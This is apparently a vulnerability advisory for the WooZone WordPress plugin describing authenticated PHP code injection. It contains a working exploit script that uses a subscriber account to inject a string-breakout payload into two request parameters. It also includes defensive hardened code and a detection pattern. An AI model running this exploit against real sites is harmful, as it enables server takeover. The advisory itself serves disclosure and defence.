WooZone - WooCommerce Amazon Affiliates [Authenticated Remote Code Execution]
This vulnerability is related to DWF-2017-87001, check WooZone - WooCommerce Amazon Affiliates [Arbitrary File Upload] for details.
Description
Further investigation by MattR revealed that the $_REQUEST['WooZone-key'] parameter can be used for code injection in the modules/remote_support/remote_init.php file. Checking this part of the code, I discovered that both this parameter and $_REQUEST['WooZone-access_path'] are vulnerable to this attack.

In this case, instead of first updating $_REQUEST['WooZone-key'] and then using that key to update a file, we inject code in the vulnerable params and then request the woozone/modules/remote_support/remote_tunnel.php file in order to execute the injected code.
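As an added illustration that is not WooZone's code and not part of the original advisory, the snippet below shows the bug class the description refers to (request values written verbatim into a PHP source file that is later executed) beside a hardened version that allow-lists keys, validates value formats and lets var_export() produce the literal. The function names, the allowed keys and the value formats are assumptions made for the example; the payload string is constructed to have the shape of the one used in the PoC. The last helper is the kind of check a WAF rule or log review would use to flag a value that can terminate a PHP string literal or comment out the rest of a line.

```php
<?php
// Added illustration (hypothetical code, not the plugin's): request values
// concatenated into PHP source, and a hardened alternative.

// Vulnerable pattern: untrusted values are spliced into a PHP string literal.
// A value shaped like  "); die("x");/*  closes the literal and adds statements.
function build_tunnel_source_vulnerable(array $values): string
{
    $src = "<?php\n";
    foreach ($values as $key => $value) {
        $src .= 'define("' . $key . '", "' . $value . '");' . "\n";
    }
    return $src;
}

// Hardened pattern: known keys only, values constrained to a tight format,
// and serialisation delegated to var_export(), which always emits a valid,
// escaped PHP literal regardless of the value's contents.
const ALLOWED_KEYS = ['WooZone-key', 'WooZone-access_path'];   // assumed

function validate_value(string $key, string $value): bool
{
    switch ($key) {
        case 'WooZone-key':
            // assumption for the example: keys are hex tokens
            return (bool) preg_match('/\A[a-f0-9]{16,64}\z/', $value);
        case 'WooZone-access_path':
            // relative path, no traversal, no quotes or PHP delimiters
            return (bool) preg_match('#\A[A-Za-z0-9_./-]{1,255}\z#', $value)
                && strpos($value, '..') === false;
        default:
            return false;
    }
}

function build_tunnel_source_hardened(array $values): string
{
    $clean = [];
    foreach ($values as $key => $value) {
        if (!in_array($key, ALLOWED_KEYS, true) || !is_string($value)
            || !validate_value($key, $value)) {
            throw new InvalidArgumentException("rejected parameter: $key");
        }
        $clean[$key] = $value;
    }
    // Nothing from the request can terminate the string or add statements.
    return "<?php\nreturn " . var_export($clean, true) . ";\n";
}

// Detection helper for request inspection: does a value contain characters
// that can end a PHP string literal, open or close a comment, or switch
// PHP mode? Quotes, backslash, semicolon, /* */, <? ?> and newlines.
function looks_like_php_breakout(string $value): bool
{
    return (bool) preg_match('/["\'\\\\;]|\/\*|\*\/|<\?|\?>|\n/', $value);
}

// Demonstration on a constructed payload shaped like the one in this advisory.
$payload = '"); die("abc123");/*';
$benign  = 'modules/remote_support';

echo looks_like_php_breakout($payload) ? "payload flagged\n" : "payload missed\n";
echo looks_like_php_breakout($benign)  ? "benign flagged\n"  : "benign passes\n";

// Vulnerable builder: the generated source now contains an injected die() call.
echo build_tunnel_source_vulnerable(['WooZone-key' => $payload]);

// Hardened builder: the same payload is rejected before anything is written,
// while a well-formed path is serialised safely.
try {
    build_tunnel_source_hardened(['WooZone-key' => $payload]);
} catch (InvalidArgumentException $e) {
    echo "hardened: " . $e->getMessage() . "\n";
}
echo build_tunnel_source_hardened(['WooZone-access_path' => $benign]);
```

The hardened variant also changes what the generated file is: a PHP file that returns an array rather than one that executes definitions, so even a future validation gap would yield a malformed literal rather than an executable statement.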
PoC
The source files were provided by Brad from a hacked website. It seems like the remote_support module is missing the config.php file. Without it the module won't load and this attack will fail. The contents of the config.php file should look like this:
<?php
echo json_encode(
    array(
        'remote_support' => array(
            'version' => '1.0',
            'menu' => array(
                'order' => 20,
                'show_in_menu' => true,
                'title' => 'Remote support',
                'icon' => 'images/16.png'
            ),
            /*'in_dashboard' => array(
                'icon' => 'images/32.png',
                'url' => admin_url("admin.php?page=WooZone_remote_support")
            ),*/
            'help' => array(
                'type' => 'remote',
                'url' => 'http://docs.aa-team.com/woocommerce-amazon-affiliates/documentation/price_select/'
            ),
            'description' => "....",
            'module_init' => 'init.php',
            'load_in' => array(
                'backend' => array(
                    'admin.php?page=WooZone_remote_support',
                    'admin-ajax.php'
                ),
                'frontend' => false
            ),
            'javascript' => array(
                'admin',
                'hashchange',
                'tipsy',
                'thickbox'
            ),
            'css' => array(
                'admin',
                'tipsy'
            )
        )
    )
);
Actual exploit:
#!/usr/bin/env php
<?php
/*******************************************************************************
 * WooZone - WooCommerce Amazon Affiliates [Remote Code Execution]
 *
 * Exploit Author: Pan Vag <[email protected]>
 * To install deps run `composer install`
 ******************************************************************************/
require_once 'vendor/autoload.php';

use Wordfence\ExKit\Cli;
use Wordfence\ExKit\Config;
use Wordfence\ExKit\Endpoint;
use Wordfence\ExKit\ExitCodes;
use Wordfence\ExKit\Session;
use Wordfence\ExKit\WPAuthentication;

// Target site URL is read from the ExKit config (prompted for if missing).
Config::get('url.base', null, true, 'Enter the site URL')
    || ExitCodes::exitWithFailedPrecondition('You must enter a valid URL');

$s = new Session();
$s->XDebugOn();

// Authenticated: a low-privilege (subscriber) account is sufficient.
Cli::writeInfo('Authenticating...');
WPAuthentication::logInAsUserRole($s, WPAuthentication::USER_ROLE_SUBSCRIBER);

// Both request parameters are written unescaped into remote_tunnel.php.
$vulnerableParams = ['WooZone-access_path', 'WooZone-key'];

foreach ($vulnerableParams as $vulnerable_param) {
    Cli::writeInfo('Exploiting using $_REQUEST[' . $vulnerable_param . '] param...');

    // Unique marker so the validation step can recognise our output.
    $identifier = uniqid();
    $postData = [
        'action'      => 'WooZoneRemoteSupportRequest',
        'sub_actions' => 'access_details',
        'params'      => http_build_query([
            'WooZone-allow_file_remote' => 'yes',
            $vulnerable_param           => '"); die("' . $identifier . '");/*',
        ]),
    ];

    $r     = $s->post(Endpoint::adminAjaxURL(), [], $postData);
    $rJson = @json_decode($r->body);
    if (!$r->success || !$rJson || !isset($rJson->status) || $rJson->status != 'valid') {
        ExitCodes::exitWithFailed('Failed to exploit');
    }

    // Requesting the rewritten file executes the injected code.
    Cli::writeInfo('Validating exploit...');
    $fileUrl = Endpoint::pluginsURL() . '/woozone/modules/remote_support/remote_tunnel.php';
    $r       = Requests::get($fileUrl);
    if (!$r->success || $r->body != $identifier) {
        Cli::writeError('Failed to validate exploitation through $_REQUEST[' . $vulnerable_param . '] param');
    } else {
        Cli::writeSuccess('Successful exploitation using $_REQUEST[' . $vulnerable_param . '] param');
    }
}

ExitCodes::exitWithInformational('Exploitation attempt finished');
- 5 June 2017
- Pan Vagenas
- codecanyon.net
- WooZone - WooCommerce Amazon Affiliates
- 9.0.2.17
- WordPress 4.7.0
- DWF-2017-87014